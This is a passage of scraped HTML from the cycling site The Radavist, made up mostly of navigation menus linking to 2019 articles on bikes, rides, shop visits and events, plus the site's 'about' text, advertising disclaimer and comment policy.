href="https://theradavist.com/2019/05/cascada-all-road-venture-jersey/">Cascada All Road: Venture Jersey</a></div></div></div></div> <div class="sub_menu_block_wrap"><div class="sub_menu_block"><div class="sub_menu_block_inner"> <a href="https://theradavist.com/2019/05/standerts-kreissage-2nd-cut-disc-road-bike-is-made-in-italy/"><img src="https://media.theradavist.com/uploads/2019/05/Profileshot_website_895fd4bf-d5d8-4331-917e-67b0a172be3c_2048x.png?resize=600,360&amp;quality=75" class="attachment-thumb-article size-thumb-article wp-post-image" alt="" srcset="https://media.theradavist.com/uploads/2019/05/Profileshot_website_895fd4bf-d5d8-4331-917e-67b0a172be3c_2048x.png?resize=600,360&amp;quality=75 600w, https://media.theradavist.com/uploads/2019/05/Profileshot_website_895fd4bf-d5d8-4331-917e-67b0a172be3c_2048x.png?resize=1200,720&amp;quality=75 1200w" sizes="(max-width: 600px) 100vw, 600px" /></a> <div class="sub-menu-block-title cf"> <a href="https://theradavist.com/2019/05/standerts-kreissage-2nd-cut-disc-road-bike-is-made-in-italy/">Standert&rsquo;s Kreiss&Atilde;&curren;ge 2nd Cut DISC Road ...</a></div></div></div></div> </div> <div id="framebuildersradar" class="col_wrap cf" style="display:none"> <div class="sub_menu_block_wrap"><div class="sub_menu_block"><div class="sub_menu_block_inner"> <a href="https://theradavist.com/2019/04/the-2019-speedvagen-guidebook/"><img src="https://media.theradavist.com/uploads/2019/04/SV18_RR_LTGRN_8.jpg?resize=600,360&amp;quality=75" class="attachment-thumb-article size-thumb-article wp-post-image" alt="" srcset="https://media.theradavist.com/uploads/2019/04/SV18_RR_LTGRN_8.jpg?resize=600,360&amp;quality=75 600w, https://media.theradavist.com/uploads/2019/04/SV18_RR_LTGRN_8.jpg?resize=1200,720&amp;quality=75 1200w" sizes="(max-width: 600px) 100vw, 600px" /></a> <div class="sub-menu-block-title cf"> <a href="https://theradavist.com/2019/04/the-2019-speedvagen-guidebook/">The 2019 Speedvagen Guidebook</a></div></div></div></div> <div class="sub_menu_block_wrap"><div class="sub_menu_block"><div class="sub_menu_block_inner"> <a href="https://theradavist.com/2019/04/support-trails-and-win-a-caletti-hardtail/"><img src="https://media.theradavist.com/uploads/2019/04/mbosc-caletti-campaign-square-green-1-1.png?resize=600,360&amp;quality=75" class="attachment-thumb-article size-thumb-article wp-post-image" alt="" /></a> <div class="sub-menu-block-title cf"> <a href="https://theradavist.com/2019/04/support-trails-and-win-a-caletti-hardtail/">Support Trails and Win a Caletti!</a></div></div></div></div> <div class="sub_menu_block_wrap"><div class="sub_menu_block"><div class="sub_menu_block_inner"> <a href="https://theradavist.com/2019/03/mosaic-cycles-celebrates-10-year-anniversary-at-the-2019-nahbs/"><img src="https://media.theradavist.com/uploads/2019/03/Screen-Shot-2019-03-13-at-8.42.25-AM.png?resize=600,360&amp;quality=75" class="attachment-thumb-article size-thumb-article wp-post-image" alt="" /></a> <div class="sub-menu-block-title cf"> <a href="https://theradavist.com/2019/03/mosaic-cycles-celebrates-10-year-anniversary-at-the-2019-nahbs/">Mosaic Cycles Celebrates 10-Year Anniver...</a></div></div></div></div> <div class="sub_menu_block_wrap"><div class="sub_menu_block"><div class="sub_menu_block_inner"> <a href="https://theradavist.com/2019/03/breadwinner-cycles-acquires-sugar-wheel-works/"><img src="https://media.theradavist.com/uploads/2018/09/SugarWheelWorks-36.jpg?resize=600,360&amp;quality=75" class="attachment-thumb-article size-thumb-article wp-post-image" alt="" /></a> <div class="sub-menu-block-title cf"> <a href="https://theradavist.com/2019/03/breadwinner-cycles-acquires-sugar-wheel-works/">Breadwinner Cycles Joins Forces Sugar Wh...</a></div></div></div></div> </div> <div id="randomnessradar" class="col_wrap cf" style="display:none"> <div class="sub_menu_block_wrap"><div class="sub_menu_block"><div class="sub_menu_block_inner"> <a href="https://theradavist.com/2019/05/it-was-time-for-a-switch-to-shimano-pedals/"><img src="https://media.theradavist.com/uploads/2019/01/Santa-Cruz-5010-37-1.jpg?resize=600,360&amp;quality=75" class="attachment-thumb-article size-thumb-article wp-post-image" alt="" /></a> <div class="sub-menu-block-title cf"> <a href="https://theradavist.com/2019/05/it-was-time-for-a-switch-to-shimano-pedals/">It Was Time for a Switch to Shimano Peda...</a></div></div></div></div> <div class="sub_menu_block_wrap"><div class="sub_menu_block"><div class="sub_menu_block_inner"> <a href="https://theradavist.com/2019/05/we-need-a-paradigm-shift-in-how-we-talk-about-drivers-hitting-cyclists/"><img src="https://media.theradavist.com/uploads/2019/05/drivers-hitting-cyclists_h.jpg?resize=600,360&amp;quality=75" class="attachment-thumb-article size-thumb-article wp-post-image" alt="" /></a> <div class="sub-menu-block-title cf"> <a href="https://theradavist.com/2019/05/we-need-a-paradigm-shift-in-how-we-talk-about-drivers-hitting-cyclists/">We Need a Paradigm Shift in How We Talk ...</a></div></div></div></div> <div class="sub_menu_block_wrap"><div class="sub_menu_block"><div class="sub_menu_block_inner"> <a href="https://theradavist.com/2019/05/the-swift-adventure-co/"><img src="https://media.theradavist.com/uploads/2019/05/Screen-Shot-2019-05-02-at-8.46.25-AM.png?resize=600,360&amp;quality=75" class="attachment-thumb-article size-thumb-article wp-post-image" alt="" srcset="https://media.theradavist.com/uploads/2019/05/Screen-Shot-2019-05-02-at-8.46.25-AM.png?resize=600,360&amp;quality=75 600w, https://media.theradavist.com/uploads/2019/05/Screen-Shot-2019-05-02-at-8.46.25-AM.png?resize=1200,720&amp;quality=75 1200w" sizes="(max-width: 600px) 100vw, 600px" /></a> <div class="sub-menu-block-title cf"> <a href="https://theradavist.com/2019/05/the-swift-adventure-co/">The Swift Adventure Co</a></div></div></div></div> <div class="sub_menu_block_wrap"><div class="sub_menu_block"><div class="sub_menu_block_inner"> <a href="https://theradavist.com/2019/04/do-you-want-road-or-mtb-jerseys-or-both/"><img src="https://media.theradavist.com/uploads/2018/10/RadPreview.jpg?resize=600,360&amp;quality=75" class="attachment-thumb-article size-thumb-article wp-post-image" alt="" /></a> <div class="sub-menu-block-title cf"> <a href="https://theradavist.com/2019/04/do-you-want-road-or-mtb-jerseys-or-both/">Do You Want Road or MTB Jerseys? Or Both...</a></div></div></div></div> </div> </div> <!-- expanded-blocks --> </div> <!-- end #radar --> <div id="reportage" class="menu-block" style="display:block"> <div class="sub_menu_wrap"> <div class="sub_menu"> <div class="sub_menu_inner"> <!-- <li class="menu-block-nav-tab active-menu-block-item" id="comingsoon-tab">Coming Soon</li> <li class="menu-block-nav-tab" id="popular-tab">Popular</li> <li class="menu-block-nav-tab" id="trending-tab">Trending</li>--> <li class="menu-block-nav-tab active-menu-block-item" id="beautifulbicycles-tab">Beautiful Bicycles</li> <li class="menu-block-nav-tab" id="rides-tab">Rides</li> <li class="menu-block-nav-tab" id="shopvisits-tab">Shop Visits</li> <li class="menu-block-nav-tab" id="recentroll-tab">Recent Roll</li> <li class="menu-block-nav-tab" id="reviews-tab">Reviews</li> <li class="menu-block-nav-tab" id="eventrecap-tab">Event Recap</li> </div> </div> </div> <div class="expanded-blocks cf"> <!--<div id="comingsoon" class="col_wrap cf"> </div> <div id="popular" class="col_wrap cf" style="display:none"> </div> <div id="trending" class="col_wrap cf" style="display:none"> </div>--> <div id="beautifulbicycles" class="col_wrap cf first" style="display:block"> <div class="sub_menu_block_wrap"><div class="sub_menu_block"><div class="sub_menu_block_inner"> <a href="https://theradavist.com/2019/05/christopher-russells-art-rambler-is-a-mobile-paint-studio/"><img src="https://media.theradavist.com/uploads/2019/05/DSF2997.jpg?resize=600,360&amp;quality=75" class="attachment-thumb-article size-thumb-article wp-post-image" alt="" srcset="https://media.theradavist.com/uploads/2019/05/DSF2997.jpg?resize=600,360&amp;quality=75 600w, https://media.theradavist.com/uploads/2019/05/DSF2997.jpg?resize=1200,720&amp;quality=75 1200w" sizes="(max-width: 600px) 100vw, 600px" /></a> <div class="sub-menu-block-title cf"> <a href="https://theradavist.com/2019/05/christopher-russells-art-rambler-is-a-mobile-paint-studio/">Christopher Russell&rsquo;s Art Rambler is a M...</a></div></div></div></div> <div class="sub_menu_block_wrap"><div class="sub_menu_block"><div class="sub_menu_block_inner"> <a href="https://theradavist.com/2019/05/jarrods-northern-frameworks-copper-hardtail-in-the-mountains-of-la/"><img src="https://media.theradavist.com/uploads/2019/05/Jarrods-Northern-Frameworks-Hardtail-61.jpg?resize=600,360&amp;quality=75" class="attachment-thumb-article size-thumb-article wp-post-image" alt="" srcset="https://media.theradavist.com/uploads/2019/05/Jarrods-Northern-Frameworks-Hardtail-61.jpg?resize=600,360&amp;quality=75 600w, https://media.theradavist.com/uploads/2019/05/Jarrods-Northern-Frameworks-Hardtail-61.jpg?resize=1200,720&amp;quality=75 1200w" sizes="(max-width: 600px) 100vw, 600px" /></a> <div class="sub-menu-block-title cf"> <a href="https://theradavist.com/2019/05/jarrods-northern-frameworks-copper-hardtail-in-the-mountains-of-la/">Jarrod&rsquo;s Northern Frameworks Copper Hard...</a></div></div></div></div> <div class="sub_menu_block_wrap"><div class="sub_menu_block"><div class="sub_menu_block_inner"> <a href="https://theradavist.com/2019/05/meet-the-new-quincy-julianas-answer-to-the-popular-santa-cruz-stigmata-amy-jurries/"><img src="https://media.theradavist.com/uploads/2019/05/JulianaQuincy-1.jpg?resize=600,360&amp;quality=75" class="attachment-thumb-article size-thumb-article wp-post-image" alt="" srcset="https://media.theradavist.com/uploads/2019/05/JulianaQuincy-1.jpg?resize=600,360&amp;quality=75 600w, https://media.theradavist.com/uploads/2019/05/JulianaQuincy-1.jpg?resize=1200,720&amp;quality=75 1200w" sizes="(max-width: 600px) 100vw, 600px" /></a> <div class="sub-menu-block-title cf"> <a href="https://theradavist.com/2019/05/meet-the-new-quincy-julianas-answer-to-the-popular-santa-cruz-stigmata-amy-jurries/">Meet the New Quincy: Juliana&acirc;&#128;&#153;s Answer ...</a></div></div></div></div> <div class="sub_menu_block_wrap"><div class="sub_menu_block"><div class="sub_menu_block_inner"> <a href="https://theradavist.com/2019/05/cant-stop-wont-stop-with-winneteaux-spencer-harding/"><img src="https://media.theradavist.com/uploads/2019/05/Cant-Stop-Wont-Stop-58.jpg?resize=600,360&amp;quality=75" class="attachment-thumb-article size-thumb-article wp-post-image" alt="" srcset="https://media.theradavist.com/uploads/2019/05/Cant-Stop-Wont-Stop-58.jpg?resize=600,360&amp;quality=75 600w, https://media.theradavist.com/uploads/2019/05/Cant-Stop-Wont-Stop-58.jpg?resize=1200,720&amp;quality=75 1200w" sizes="(max-width: 600px) 100vw, 600px" /></a> <div class="sub-menu-block-title cf"> <a href="https://theradavist.com/2019/05/cant-stop-wont-stop-with-winneteaux-spencer-harding/">Can&rsquo;t Stop Won&rsquo;t Stop With Winneteaux &ndash; ...</a></div></div></div></div> </div> <div id="rides" class="col_wrap cf" style="display:none"> <div class="sub_menu_block_wrap"><div class="sub_menu_block"><div class="sub_menu_block_inner"> <a href="https://theradavist.com/2019/05/bikepacking-roots-announces-the-wild-west-route/"><img src="https://media.theradavist.com/uploads/2019/05/wild-west-route-6.jpg?resize=600,360&amp;quality=75" class="attachment-thumb-article size-thumb-article wp-post-image" alt="" srcset="https://media.theradavist.com/uploads/2019/05/wild-west-route-6.jpg?resize=600,360&amp;quality=75 600w, https://media.theradavist.com/uploads/2019/05/wild-west-route-6.jpg?resize=1200,720&amp;quality=75 1200w" sizes="(max-width: 600px) 100vw, 600px" /></a> <div class="sub-menu-block-title cf"> <a href="https://theradavist.com/2019/05/bikepacking-roots-announces-the-wild-west-route/">Bikepacking Roots Announces the Wild Wes...</a></div></div></div></div> <div class="sub_menu_block_wrap"><div class="sub_menu_block"><div class="sub_menu_block_inner"> <a href="https://theradavist.com/2019/05/sonoran-overnighter-spencer-harding/"><img src="https://media.theradavist.com/uploads/2019/05/Sonoran-Overnighter-26.jpg?resize=600,360&amp;quality=75" class="attachment-thumb-article size-thumb-article wp-post-image" alt="" srcset="https://media.theradavist.com/uploads/2019/05/Sonoran-Overnighter-26.jpg?resize=600,360&amp;quality=75 600w, https://media.theradavist.com/uploads/2019/05/Sonoran-Overnighter-26.jpg?resize=1200,720&amp;quality=75 1200w" sizes="(max-width: 600px) 100vw, 600px" /></a> <div class="sub-menu-block-title cf"> <a href="https://theradavist.com/2019/05/sonoran-overnighter-spencer-harding/">Sonoran Overnighter &#8211; Spencer Harding</a></div></div></div></div> <div class="sub_menu_block_wrap"><div class="sub_menu_block"><div class="sub_menu_block_inner"> <a href="https://theradavist.com/2019/05/a-weekend-pedal-across-the-english-isle-with-pannier-mark-finster/"><img src="https://media.theradavist.com/uploads/2019/04/Route-Beer-Ramble-2019-7519.jpg?resize=600,360&amp;quality=75" class="attachment-thumb-article size-thumb-article wp-post-image" alt="" srcset="https://media.theradavist.com/uploads/2019/04/Route-Beer-Ramble-2019-7519.jpg?resize=600,360&amp;quality=75 600w, https://media.theradavist.com/uploads/2019/04/Route-Beer-Ramble-2019-7519.jpg?resize=1200,720&amp;quality=75 1200w" sizes="(max-width: 600px) 100vw, 600px" /></a> <div class="sub-menu-block-title cf"> <a href="https://theradavist.com/2019/05/a-weekend-pedal-across-the-english-isle-with-pannier-mark-finster/">A Weekend Pedal Across the English Isle ...</a></div></div></div></div> <div class="sub_menu_block_wrap"><div class="sub_menu_block"><div class="sub_menu_block_inner"> <a href="https://theradavist.com/2019/04/sprung-has-sprung/"><img src="https://media.theradavist.com/uploads/2019/04/strawberryspring.png?resize=600,360&amp;quality=75" class="attachment-thumb-article size-thumb-article wp-post-image" alt="" srcset="https://media.theradavist.com/uploads/2019/04/strawberryspring.png?resize=600,360&amp;quality=75 600w, https://media.theradavist.com/uploads/2019/04/strawberryspring.png?resize=1200,720&amp;quality=75 1200w" sizes="(max-width: 600px) 100vw, 600px" /></a> <div class="sub-menu-block-title cf"> <a href="https://theradavist.com/2019/04/sprung-has-sprung/">Spring Has Sprung in LA</a></div></div></div></div> </div> <div id="shopvisits" class="col_wrap cf" style="display:none"> <div class="sub_menu_block_wrap"><div class="sub_menu_block"><div class="sub_menu_block_inner"> <a href="https://theradavist.com/2019/05/cactus-fruit-and-community-at-fass-bike-locke-hassett/"><img src="https://media.theradavist.com/uploads/2019/04/FASS-Bike-16.jpg?resize=600,360&amp;quality=75" class="attachment-thumb-article size-thumb-article wp-post-image" alt="" srcset="https://media.theradavist.com/uploads/2019/04/FASS-Bike-16.jpg?resize=600,360&amp;quality=75 600w, https://media.theradavist.com/uploads/2019/04/FASS-Bike-16.jpg?resize=1200,720&amp;quality=75 1200w" sizes="(max-width: 600px) 100vw, 600px" /></a> <div class="sub-menu-block-title cf"> <a href="https://theradavist.com/2019/05/cactus-fruit-and-community-at-fass-bike-locke-hassett/">Cactus Fruit and Community at FASS Bike ...</a></div></div></div></div> <div class="sub_menu_block_wrap"><div class="sub_menu_block"><div class="sub_menu_block_inner"> <a href="https://theradavist.com/2019/05/btchn-bikes-the-latest-chapter-in-chico-framebuilding-california-travis/"><img src="https://media.theradavist.com/uploads/2019/05/Cross-Bike-COVER.jpg?resize=600,360&amp;quality=75" class="attachment-thumb-article size-thumb-article wp-post-image" alt="" srcset="https://media.theradavist.com/uploads/2019/05/Cross-Bike-COVER.jpg?resize=600,360&amp;quality=75 600w, https://media.theradavist.com/uploads/2019/05/Cross-Bike-COVER.jpg?resize=1200,720&amp;quality=75 1200w" sizes="(max-width: 600px) 100vw, 600px" /></a> <div class="sub-menu-block-title cf"> <a href="https://theradavist.com/2019/05/btchn-bikes-the-latest-chapter-in-chico-framebuilding-california-travis/">BTCHN&acirc;&#128;&#153; Bikes: the Latest Chapter in Ch...</a></div></div></div></div> <div class="sub_menu_block_wrap"><div class="sub_menu_block"><div class="sub_menu_block_inner"> <a href="https://theradavist.com/2019/04/checking-in-with-strawfoot-handmade/"><img src="https://media.theradavist.com/uploads/2019/04/Strawfoot_Cover-copy.png?resize=600,360&amp;quality=75" class="attachment-thumb-article size-thumb-article wp-post-image" alt="" srcset="https://media.theradavist.com/uploads/2019/04/Strawfoot_Cover-copy.png?resize=600,360&amp;quality=75 600w, https://media.theradavist.com/uploads/2019/04/Strawfoot_Cover-copy.png?resize=1200,720&amp;quality=75 1200w" sizes="(max-width: 600px) 100vw, 600px" /></a> <div class="sub-menu-block-title cf"> <a href="https://theradavist.com/2019/04/checking-in-with-strawfoot-handmade/">Checking in With Strawfoot Handmade</a></div></div></div></div> <div class="sub_menu_block_wrap"><div class="sub_menu_block"><div class="sub_menu_block_inner"> <a href="https://theradavist.com/2019/04/belmar-bike-shops-beach-front-bbq-bash-jarrod-bunk/"><img src="https://media.theradavist.com/uploads/2019/04/Belmar-BBQ_-13.jpg?resize=600,360&amp;quality=75" class="attachment-thumb-article size-thumb-article wp-post-image" alt="" srcset="https://media.theradavist.com/uploads/2019/04/Belmar-BBQ_-13.jpg?resize=600,360&amp;quality=75 600w, https://media.theradavist.com/uploads/2019/04/Belmar-BBQ_-13.jpg?resize=1200,720&amp;quality=75 1200w" sizes="(max-width: 600px) 100vw, 600px" /></a> <div class="sub-menu-block-title cf"> <a href="https://theradavist.com/2019/04/belmar-bike-shops-beach-front-bbq-bash-jarrod-bunk/">Belmar Bike Shop&rsquo;s Beach Front BBQ Bash ...</a></div></div></div></div> </div> <div id="recentroll" class="col_wrap cf" style="display:none"> <div class="sub_menu_block_wrap"><div class="sub_menu_block"><div class="sub_menu_block_inner"> <a href="https://theradavist.com/2019/05/cactus-fruit-and-community-at-fass-bike-locke-hassett/"><img src="https://media.theradavist.com/uploads/2019/04/FASS-Bike-16.jpg?resize=600,360&amp;quality=75" class="attachment-thumb-article size-thumb-article wp-post-image" alt="" srcset="https://media.theradavist.com/uploads/2019/04/FASS-Bike-16.jpg?resize=600,360&amp;quality=75 600w, https://media.theradavist.com/uploads/2019/04/FASS-Bike-16.jpg?resize=1200,720&amp;quality=75 1200w" sizes="(max-width: 600px) 100vw, 600px" /></a> <div class="sub-menu-block-title cf"> <a href="https://theradavist.com/2019/05/cactus-fruit-and-community-at-fass-bike-locke-hassett/">Cactus Fruit and Community at FASS Bike ...</a></div></div></div></div> <div class="sub_menu_block_wrap"><div class="sub_menu_block"><div class="sub_menu_block_inner"> <a href="https://theradavist.com/2019/02/single-speed-arizona-black-canyon-trail-edition-josh-weinberg-and-corbin-brady/"><img src="https://media.theradavist.com/uploads/2019/02/SSAZ58.jpg?resize=600,360&amp;quality=75" class="attachment-thumb-article size-thumb-article wp-post-image" alt="" /></a> <div class="sub-menu-block-title cf"> <a href="https://theradavist.com/2019/02/single-speed-arizona-black-canyon-trail-edition-josh-weinberg-and-corbin-brady/">Single Speed Arizona: Black Canyon Trail...</a></div></div></div></div> <div class="sub_menu_block_wrap"><div class="sub_menu_block"><div class="sub_menu_block_inner"> <a href="https://theradavist.com/2018/12/holy-gaiole-kyle-kelley/"><img src="https://media.theradavist.com/uploads/2018/12/Eroica2018Story-34.jpg?resize=600,360&amp;quality=75" class="attachment-thumb-article size-thumb-article wp-post-image" alt="" /></a> <div class="sub-menu-block-title cf"> <a href="https://theradavist.com/2018/12/holy-gaiole-kyle-kelley/">Holy Gaiole!!! &#8211; Kyle Kelley</a></div></div></div></div> <div class="sub_menu_block_wrap"><div class="sub_menu_block"><div class="sub_menu_block_inner"> <a href="https://theradavist.com/2018/12/the-devil-in-a-dress-leroica-celebrates-alfonsina-strada-tenzin-namdol/"><img src="https://media.theradavist.com/uploads/2018/12/DSCF3455.jpg?resize=600,360&amp;quality=75" class="attachment-thumb-article size-thumb-article wp-post-image" alt="" /></a> <div class="sub-menu-block-title cf"> <a href="https://theradavist.com/2018/12/the-devil-in-a-dress-leroica-celebrates-alfonsina-strada-tenzin-namdol/">The Devil in a Dress; L&acirc;&#128;&#153;Eroica Celebra...</a></div></div></div></div> </div> <div id="eventrecap" class="col_wrap cf" style="display:none"> <div class="sub_menu_block_wrap"><div class="sub_menu_block"><div class="sub_menu_block_inner"> <a href="https://theradavist.com/2019/04/the-2019-sea-otter-classic-mega-gallery/"><img src="https://media.theradavist.com/uploads/2019/04/SeaOtter2019-216.jpg?resize=600,360&amp;quality=75" class="attachment-thumb-article size-thumb-article wp-post-image" alt="" srcset="https://media.theradavist.com/uploads/2019/04/SeaOtter2019-216.jpg?resize=600,360&amp;quality=75 600w, https://media.theradavist.com/uploads/2019/04/SeaOtter2019-216.jpg?resize=1200,720&amp;quality=75 1200w" sizes="(max-width: 600px) 100vw, 600px" /></a> <div class="sub-menu-block-title cf"> <a href="https://theradavist.com/2019/04/the-2019-sea-otter-classic-mega-gallery/">The 2019 Sea Otter Classic Mega Gallery</a></div></div></div></div> <div class="sub_menu_block_wrap"><div class="sub_menu_block"><div class="sub_menu_block_inner"> <a href="https://theradavist.com/2019/04/finger-crossed-for-a-fairweather-forecast/"><img src="https://media.theradavist.com/uploads/2019/04/Land-Run-100-59-1.jpg?resize=600,360&amp;quality=75" class="attachment-thumb-article size-thumb-article wp-post-image" alt="" srcset="https://media.theradavist.com/uploads/2019/04/Land-Run-100-59-1.jpg?resize=600,360&amp;quality=75 600w, https://media.theradavist.com/uploads/2019/04/Land-Run-100-59-1.jpg?resize=1200,720&amp;quality=75 1200w" sizes="(max-width: 600px) 100vw, 600px" /></a> <div class="sub-menu-block-title cf"> <a href="https://theradavist.com/2019/04/finger-crossed-for-a-fairweather-forecast/">Fingers Crossed For A Fair-weather Forec...</a></div></div></div></div> <div class="sub_menu_block_wrap"><div class="sub_menu_block"><div class="sub_menu_block_inner"> <a href="https://theradavist.com/2019/04/stayin-warm-at-frostbike/"><img src="https://media.theradavist.com/uploads/2019/03/FROSTBIKESTHEBEST-123.jpg?resize=600,360&amp;quality=75" class="attachment-thumb-article size-thumb-article wp-post-image" alt="" srcset="https://media.theradavist.com/uploads/2019/03/FROSTBIKESTHEBEST-123.jpg?resize=600,360&amp;quality=75 600w, https://media.theradavist.com/uploads/2019/03/FROSTBIKESTHEBEST-123.jpg?resize=1200,720&amp;quality=75 1200w" sizes="(max-width: 600px) 100vw, 600px" /></a> <div class="sub-menu-block-title cf"> <a href="https://theradavist.com/2019/04/stayin-warm-at-frostbike/">Stayin&#8217; Warm At Frostbike &#8211; Jarrod Bunk</a></div></div></div></div> <div class="sub_menu_block_wrap"><div class="sub_menu_block"><div class="sub_menu_block_inner"> <a href="https://theradavist.com/2019/02/single-speed-arizona-black-canyon-trail-edition-josh-weinberg-and-corbin-brady/"><img src="https://media.theradavist.com/uploads/2019/02/SSAZ58.jpg?resize=600,360&amp;quality=75" class="attachment-thumb-article size-thumb-article wp-post-image" alt="" /></a> <div class="sub-menu-block-title cf"> <a href="https://theradavist.com/2019/02/single-speed-arizona-black-canyon-trail-edition-josh-weinberg-and-corbin-brady/">Single Speed Arizona: Black Canyon Trail...</a></div></div></div></div> </div> <div id="reviews" class="col_wrap cf" style="display:none"> <div class="sub_menu_block_wrap"><div class="sub_menu_block"><div class="sub_menu_block_inner"> <a href="https://theradavist.com/2019/05/meet-the-new-quincy-julianas-answer-to-the-popular-santa-cruz-stigmata-amy-jurries/"><img src="https://media.theradavist.com/uploads/2019/05/JulianaQuincy-1.jpg?resize=600,360&amp;quality=75" class="attachment-thumb-article size-thumb-article wp-post-image" alt="" srcset="https://media.theradavist.com/uploads/2019/05/JulianaQuincy-1.jpg?resize=600,360&amp;quality=75 600w, https://media.theradavist.com/uploads/2019/05/JulianaQuincy-1.jpg?resize=1200,720&amp;quality=75 1200w" sizes="(max-width: 600px) 100vw, 600px" /></a> <div class="sub-menu-block-title cf"> <a href="https://theradavist.com/2019/05/meet-the-new-quincy-julianas-answer-to-the-popular-santa-cruz-stigmata-amy-jurries/">Meet the New Quincy: Juliana&acirc;&#128;&#153;s Answer ...</a></div></div></div></div> <div class="sub_menu_block_wrap"><div class="sub_menu_block"><div class="sub_menu_block_inner"> <a href="https://theradavist.com/2019/04/steel-is-real-the-starling-murmur-29-factory-roosts-in-the-mountains-of-los-angeles/"><img src="https://media.theradavist.com/uploads/2019/04/The-Starling-Murmur-is-a-Steel-Full-Suspension-29er-41.jpg?resize=600,360&amp;quality=75" class="attachment-thumb-article size-thumb-article wp-post-image" alt="" srcset="https://media.theradavist.com/uploads/2019/04/The-Starling-Murmur-is-a-Steel-Full-Suspension-29er-41.jpg?resize=600,360&amp;quality=75 600w, https://media.theradavist.com/uploads/2019/04/The-Starling-Murmur-is-a-Steel-Full-Suspension-29er-41.jpg?resize=1200,720&amp;quality=75 1200w" sizes="(max-width: 600px) 100vw, 600px" /></a> <div class="sub-menu-block-title cf"> <a href="https://theradavist.com/2019/04/steel-is-real-the-starling-murmur-29-factory-roosts-in-the-mountains-of-los-angeles/">Steel is Real: The Starling Murmur 29 Fa...</a></div></div></div></div> <div class="sub_menu_block_wrap"><div class="sub_menu_block"><div class="sub_menu_block_inner"> <a href="https://theradavist.com/2019/03/kona-big-honzo-cr-dl-carbon-good-hardtails-will-never-die-locke-hassett/"><img src="https://media.theradavist.com/uploads/2019/03/5-DSC_9367.jpg?resize=600,360&amp;quality=75" class="attachment-thumb-article size-thumb-article wp-post-image" alt="" srcset="https://media.theradavist.com/uploads/2019/03/5-DSC_9367.jpg?resize=600,360&amp;quality=75 600w, https://media.theradavist.com/uploads/2019/03/5-DSC_9367.jpg?resize=1200,720&amp;quality=75 1200w" sizes="(max-width: 600px) 100vw, 600px" /></a> <div class="sub-menu-block-title cf"> <a href="https://theradavist.com/2019/03/kona-big-honzo-cr-dl-carbon-good-hardtails-will-never-die-locke-hassett/">Kona Big Honzo CR/DL Carbon: Good Hardta...</a></div></div></div></div> <div class="sub_menu_block_wrap"><div class="sub_menu_block"><div class="sub_menu_block_inner"> <a href="https://theradavist.com/2019/03/riding-salsas-new-split-pivot-mountain-bikes-on-the-black-canyon-trail/"><img src="https://media.theradavist.com/uploads/2019/02/Salsas-Split-Pivot-Bikes-on-the-Black-Canyon-Trail-5.jpg?resize=600,360&amp;quality=75" class="attachment-thumb-article size-thumb-article wp-post-image" alt="" /></a> <div class="sub-menu-block-title cf"> <a href="https://theradavist.com/2019/03/riding-salsas-new-split-pivot-mountain-bikes-on-the-black-canyon-trail/">Riding Salsa&rsquo;s New Split Pivot Mountain ...</a></div></div></div></div> </div> </div> <!-- expanded-blocks --> </div> <!-- end #reportage --> <div id="about" class="menu-block" style="display:none"> <div class="expanded-blocks first cf"> <div class="col_wrap cf first" style="display:block"> <div class="sub_menu_block_wrap"><div class="sub_menu_block"><div class="sub_menu_block_inner"> <p>Who is the Radavist?</p> <p>&nbsp;</p> <p>A group of individuals who share a love of cycling and the outdoors. We will always stop for a photo, or to hit a jump.  Rubber side up!</p> <p>&nbsp;</p> <p>We believe the outdoors should be respected. Please, pack it in and pack it out. Leave it better, even. Remember, we&#8217;re all ambassadors for cycling, so be polite on the road and the trails and observe the <a href="https://lnt.org/learn/7-principles">leave no trace principles.</a></p> <p>&nbsp;</p> <p>What does the Radavist mean?</p> <p>&nbsp;</p> <p>Rad + Atavist = RADAVIST</p> </div></div></div><div class="sub_menu_block_wrap"><div class="sub_menu_block"><div class="sub_menu_block_inner"> <p>Advertisement Disclaimer:</p> <p>&nbsp;</p> <p>These days, it&#8217;s hard to tell what is an ad and what is content. When you visit the Radavist, you can be assured that our content is our own. Unless it is explicitly noted, we do not take money to post products here on the site. We do not make sponsored posts, but we do work with brands to bring you stories, and when we do a product review, it is honest. In short: nothing was exchanged for a favorable write-up. The only money this site receives is from the ads you see on the right-hand column and from commercial photography. For our ads, we select these brands because their ideologies align with the Radavist&#8217;s. When these companies buy an ad, it does not buy content. If we post about their products, it&#8217;s because they are relevant to the site&#8217;s audience. Thank you!</p> </div></div></div><div class="sub_menu_block_wrap"><div class="sub_menu_block"><div class="sub_menu_block_inner about_block_1_text"> <p>Want to contribute? <a href="mailto:[email protected]">Send a submission</a></p> <p><a href="mailto:[email protected]">Submit a product for review</a></p> <p><a href="mailto:[email protected]">Submit a video to post</a></p> <p>Interested in advertising? email <a href="mailto:[email protected]" target="_blank" rel="noopener">the Radavist</a><span style="line-height: 1.5em;">.</span></p> <p><strong>Our comment policy is simple</strong>: we welcome and value tactful discourse and opinions. You don&#8217;t have to agree with our views but please deliver your concerns in a polite and personable manner. This is a safe place, all are welcome to engage in this community. That said, there is zero-tolerance for: racism, sexism, trolling, and slander.</p> <p>&nbsp;</p> <p>Unless otherwise noted, we do not accept funds for content. This website runs on ad revenue, however, the advertisements do not influence or affect the content or opinions of the authors. If you have concerns or questions, feel free to drop them in the comments on the relevant post.</p> </div></div></div><div class="sub_menu_block_wrap"><div class="sub_menu_block noshadow"><div class="sub_menu_block_inner"> <img src="https://media.theradavist.com/uploads/2018/01/PackItIn-decal-copy.png" /> </div></div></div> </div> </div> <!-- expanded-blocks --> </div> <!-- end #about --> </div> <!-- end .expanded-menu --> </header> <div id="content-wrap" class="cf"> <section id="sidebar-ads" class="sidebar"> <div class="sidebarad"> <a href="https://pedaled.com/newarrivals" target="_blank"> <img src="https://media.theradavist.com/uploads/2019/04/image001-1.jpg" alt="Pedaled"> </a> </div> <div class="sidebarad"> <a href="https://www.brooksengland.com/en_uk/saddles/cambium/c13-145-all-weather.html?utm_source=radavist&utm_medium=Banners&utm_campaign=C13AW&utm_term=145mm" target="_blank"> <img src="https://media.theradavist.com/uploads/2019/05/C13AllWeatherBanner.jpg" alt="Brooks"> </a> </div> <div class="sidebarad"> <a href="http://bit.ly/2GJocTZ" target="_blank"> <img src="https://media.theradavist.com/uploads/2019/04/MAXXIS-2019-Radavist-Gravel-02-600x500.jpg" alt="Maxxis"> </a> </div> <div class="sidebarad"> <a href="https://www.voilestraps.com/nano-series-straps.html?utm_source=radavist&utm_medium=600x500&utm_campaign=voilestraps" target="_blank"> <img src="https://media.theradavist.com/uploads/2019/05/voilestraps_nano_series_600x500.jpg" 